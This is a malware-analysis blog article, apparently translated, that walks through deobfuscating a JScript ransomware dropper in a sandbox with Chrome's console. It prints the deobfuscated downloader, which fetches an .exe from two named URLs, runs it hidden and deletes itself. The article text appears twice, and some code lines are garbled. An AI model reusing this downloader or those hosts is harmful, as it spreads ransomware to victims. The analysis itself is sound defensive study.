The content of the article
Before contacting me, a friend tried several times to open the file from the archive. According to him, nothing happened. But I still told him to immediately shut down the computer and remove the hard drive from it. However, it was too late.
The virus has already encrypted half of the files on the D drive and even got into the shared folder. Some of the files were recovered using tools for recovering deleted files, but according to the law of meanness, the most important files were lost. Then there was the classic of the genre: a new picture appeared on the desktop, as well as a text file demanding a certain amount for decrypting the data and the attacker's contacts.
Later I decided to deal with this virus in a sandbox (VirtualBox + Windows XP). In the archive, I found a JavaScript file, or rather a file with an extension .jsand content that resembles JavaScript in syntax.
Wrong bees
“These are the wrong bees! And their JavaScript is somehow wrong, ”I thought. In addition, the path from opening a file .jsto encrypting files, at first glance, was not traced.
There is such a thing in Windows as WSH - Windows Script Host. It is used to run scripts written in certain scripting languages, including JScript - such scripts have the .js.
INFO
JScript is Microsoft's scripting programming language that implements the ECMAScript standard. The syntax for JScript is much the same as Netscape's JavaScript, but JScript can be used not only to add client-side scripts to web pages, but also to automate Windows administration. The WScript component - Windows Script Host is responsible for the execution of such scripts. In addition to the JScript language, VBScript is supported, as well as some other additionally installed languages (for example, Perl).
Variables in the code are a random set of letters. We also know that the code contains about a hundred functions that return the result of arithmetic operations on constants, and about twenty functions that process these results in one way or another. Some functions work similarly with string constants. This suggests that the code is well obfuscated.
The whole secret is function eval(). This function executes the code passed to it as a string and returns the value equal to the last expression. Let's consider one of the functions of our ransomware.
Let's figure out what's going on here.
The Nx()previously declared function returns a string String.fromCharCode(and uSK()returns a closing parenthesis. W()takes a number as a parameter, adds one and returns eval("String.fromCharCode(" + (svu+1) + ")"). Takes a number, adds one, and converts to CHAR. Then the characters are grouped into other strings and fed to the input of the function eval(), but in a different place.
Using Chrome for help
It would take a very long time to learn all the variables and the values that these variables store. But the code is written in a language similar to JavaScript, and there are a few things that could make obfuscation easier. Namely, the developer console in the Chrome browser will serve as an excellent debugging tool.
Chrome swears at the object called ActiveXObject. This object is used by Windows and allows you to create ActiveX controls.
INFO
ActiveX is a framework for defining software components usable from programs written in different programming languages. Objects ActiveXObjectare used in Windows applications such as Internet Explorer, Microsoft Office, Microsoft Visual Studio, Windows Media Player, and the operating system itself.
The browser does not know about such delights of Windows. ActiveXObjectwas not specified in the code directly, which means that you cannot comment out the code that uses it and run it. Therefore, one cannot even see what is happening in general. But we can run individual functions and find out what they return. Fortunately, functions are declared in the order in which they are called. This allows us to consider not each function separately, but blocks of several, while paying attention only to the result of the last function.
The result was always constant, so I decided that it can be written instead of calling the last function, and the functions themselves can be deleted. Along the way, I ran the edited code in a virtual machine and compared it with the original to make sure my changes didn't affect the result.
Thus, the code is reduced significantly. Here is an example of one such chain. The function xRy()eventually returns String.from.
At the next step, I met already known to us ActiveXObject:
Here a variable is created, a function is called eval()that returns an object ActiveXObject. This means that we can delete this line, and in places where this variable is used, use the object itself. Object methods have also been obfuscated. Each name in encrypted form was defined in two lines, and a function was called to decrypt Wb().
It is not necessary to understand how this function works. After all, you can call it in the browser with the required lines. This line, for example, turns into ScriptFullName:
But how do you call a method whose name is stored in a string? The author of the malware knows this trick.
Another obfuscation technique that occurs in code is false branching. This means that a variable is created, compared with itself, and elseunnecessary code is inserted into the block . This trick does not interfere with the analysis of the code, but it slows it down.
Step by step, the source code of the malware appears in front of us. For convenience, I have replaced the names of some variables with understandable ones. The code is a body and one function. First, an array of strings is declared containing two URLs. Then a function is launched sequentially for each URL download, which tries to download the file from the accepted URL and then run it.
Returns trueif successful.
Outcomes
So, I found out that this file is only part of the ransomware. Disguised as a document, it penetrates the user's computer and loads a module that will do all the dirty work. At Kaspersky Lab, such encryptors are categorized into a separate class Trojan-Downloader.JS.Agent and described as follows:
- Wrong bees
- Using Chrome for help
- Outcomes
Before contacting me, a friend tried several times to open the file from the archive. According to him, nothing happened. But I still told him to immediately shut down the computer and remove the hard drive from it. However, it was too late.
The virus has already encrypted half of the files on the D drive and even got into the shared folder. Some of the files were recovered using tools for recovering deleted files, but according to the law of meanness, the most important files were lost. Then there was the classic of the genre: a new picture appeared on the desktop, as well as a text file demanding a certain amount for decrypting the data and the attacker's contacts.
Later I decided to deal with this virus in a sandbox (VirtualBox + Windows XP). In the archive, I found a JavaScript file, or rather a file with an extension .jsand content that resembles JavaScript in syntax.
Code:
...
function yW () {
var lN="";
lN=lN+W(101)+W(5085/45-0)+W(54+56)+W(983-875)+W(1056/16+0)+W(32+71)+W) 3456/36+0)+W(1045-932)+W(885-819)+W(10*11)+W(26+73)+W(823-723);
return lN;
}
function Gyh() {
EKT var = "";
eKt=eKt;
return eKt;
}
function Wb (Ea, Ki) {
var kO = w (Ea);
var YM = Szh ();
var Ofr = w(Ki);
var laN = [To ()] [RkE ()];
while (YM < kO) {
var hN = YM / ie ();
var cra = Ea [Hn ()] (YM);
YM = YM + Efo ();
cra = cra + Ea [mO ()] (YM);
YM = YM + Me ();
var mM = Bie(cra, dkW());
var WzA = Ki[CC()](hN % Ofr);
var dCt = mM ^ WzA;
var bHh = String [yW ()] (dCt);
laN = laN + Gyh () + bHh;
}
return laN;
}
...Wrong bees
“These are the wrong bees! And their JavaScript is somehow wrong, ”I thought. In addition, the path from opening a file .jsto encrypting files, at first glance, was not traced.
There is such a thing in Windows as WSH - Windows Script Host. It is used to run scripts written in certain scripting languages, including JScript - such scripts have the .js.
INFO
JScript is Microsoft's scripting programming language that implements the ECMAScript standard. The syntax for JScript is much the same as Netscape's JavaScript, but JScript can be used not only to add client-side scripts to web pages, but also to automate Windows administration. The WScript component - Windows Script Host is responsible for the execution of such scripts. In addition to the JScript language, VBScript is supported, as well as some other additionally installed languages (for example, Perl).
Variables in the code are a random set of letters. We also know that the code contains about a hundred functions that return the result of arithmetic operations on constants, and about twenty functions that process these results in one way or another. Some functions work similarly with string constants. This suggests that the code is well obfuscated.
The whole secret is function eval(). This function executes the code passed to it as a string and returns the value equal to the last expression. Let's consider one of the functions of our ransomware.
Code:
function W(svu) {
var bHh = eval(Nx() + (svu+1) + uSk());
return bHh;
}Let's figure out what's going on here.
The Nx()previously declared function returns a string String.fromCharCode(and uSK()returns a closing parenthesis. W()takes a number as a parameter, adds one and returns eval("String.fromCharCode(" + (svu+1) + ")"). Takes a number, adds one, and converts to CHAR. Then the characters are grouped into other strings and fed to the input of the function eval(), but in a different place.
Using Chrome for help
It would take a very long time to learn all the variables and the values that these variables store. But the code is written in a language similar to JavaScript, and there are a few things that could make obfuscation easier. Namely, the developer console in the Chrome browser will serve as an excellent debugging tool.
Chrome swears at the object called ActiveXObject. This object is used by Windows and allows you to create ActiveX controls.
INFO
ActiveX is a framework for defining software components usable from programs written in different programming languages. Objects ActiveXObjectare used in Windows applications such as Internet Explorer, Microsoft Office, Microsoft Visual Studio, Windows Media Player, and the operating system itself.
The browser does not know about such delights of Windows. ActiveXObjectwas not specified in the code directly, which means that you cannot comment out the code that uses it and run it. Therefore, one cannot even see what is happening in general. But we can run individual functions and find out what they return. Fortunately, functions are declared in the order in which they are called. This allows us to consider not each function separately, but blocks of several, while paying attention only to the result of the last function.
The result was always constant, so I decided that it can be written instead of calling the last function, and the functions themselves can be deleted. Along the way, I ran the edited code in a virtual machine and compared it with the original to make sure my changes didn't affect the result.
Thus, the code is reduced significantly. Here is an example of one such chain. The function xRy()eventually returns String.from.
Code:
...
function RVt()
{ return GH + "g"+"."; }
function c()
{ return eval("String.fromCharCode(37+74)"); }
function G()
{ return "r"+c(); }
function LNe()
{ return qQ()+G();}
function xRy()
{ return RVt()+LNe()+"m"; }
...At the next step, I met already known to us ActiveXObject:
Code:
var we = eval("ActiveXObject");Here a variable is created, a function is called eval()that returns an object ActiveXObject. This means that we can delete this line, and in places where this variable is used, use the object itself. Object methods have also been obfuscated. Each name in encrypted form was defined in two lines, and a function was called to decrypt Wb().
Code:
function Wb (Ea, Ki) {
var kO = w (Ea);
var YM = Szh ();
var Ofr = w(Ki);
var laN = [To ()] [RkE ()];
while (YM < kO) {
var hN = YM / ie ();
var cra = Ea [Hn ()] (YM);
YM = YM + Efo ();
cra = cra + Ea [mO ()] (YM);
YM = YM + Me ();
var mM = Bie(cra, dkW());
var WzA = Ki[CC()](hN % Ofr);
var dCt = mM ^ WzA;
var bHh = String [yW ()] (dCt);
laN = laN + Gyh () + bHh;
}
return laN;
}It is not necessary to understand how this function works. After all, you can call it in the browser with the required lines. This line, for example, turns into ScriptFullName:
Code:
Wb("350211334026350D0E253E290C20","facZ0RsxbIpHaEfKH0O88alv5fT70lEqyiHGesg20zxqoDXccZ356pUTXw6G1aUM0COgxBm")But how do you call a method whose name is stored in a string? The author of the malware knows this trick.
Code:
var stream = new ActiveXObject("ADODB.Stream");
stream.["Open"]();
stream.["Type"] = 1;
stream.["Write"](XMLHTTP.ResponseBody);
stream.["Position"] = 0;Another obfuscation technique that occurs in code is false branching. This means that a variable is created, compared with itself, and elseunnecessary code is inserted into the block . This trick does not interfere with the analysis of the code, but it slows it down.
Step by step, the source code of the malware appears in front of us. For convenience, I have replaced the names of some variables with understandable ones. The code is a body and one function. First, an array of strings is declared containing two URLs. Then a function is launched sequentially for each URL download, which tries to download the file from the accepted URL and then run it.
Returns trueif successful.
Code:
function download(url) {
var WShell = new ActiveXObject("Wscript.Shell");
var fsObject = new ActiveXObject("Scripting.FileSystemObject");
var XMLHTTP = new ActiveXObject("MSXML2.XMLHTTP");
XMLHTTP.open ("GET", url, 0); // Create a synchronous request
XMLHTTP.send (); // Send request
if (XMLHTTP.Status == 200) {// If the request was successful,
var newFile = fsObject.GetSpecialFolder (2) + "\\" + fsObject.GetTempName (); // get a descriptor for the temporary file
var stream = new ActiveXObject("ADODB.Stream");
stream.Open ();
stream.Type = 1; // One means binary data
stream.Write(XMLHTTP.ResponseBody);
stream.Position = 0;
if (stream.Size < 10)
return false;
stream.SaveToFile (newFile); // Save the file
WShell.run ("cmd.exe / c" + newFile, 0); // Run the file
fsObject.deleteFile (WScript.ScriptFullName); // Delete
return true;
} else {
return false;
}
return true;
}
// Body
var urls = [];
urls[0] = "http://www.interlaan.com/5e01a65eb3758.exe";
urls[1] = "http://vaibhavastrogemology.com/old/5e01a65eb3758.exe";
var flag = false;
var i = 0;
while (!flag) {
if (i > 1)
break;
flag = download(urls[i]);
i ++;
}Outcomes
So, I found out that this file is only part of the ransomware. Disguised as a document, it penetrates the user's computer and loads a module that will do all the dirty work. At Kaspersky Lab, such encryptors are categorized into a separate class Trojan-Downloader.JS.Agent and described as follows:
Well, this is where my research ends. I hope you learned some useful experience from it too.
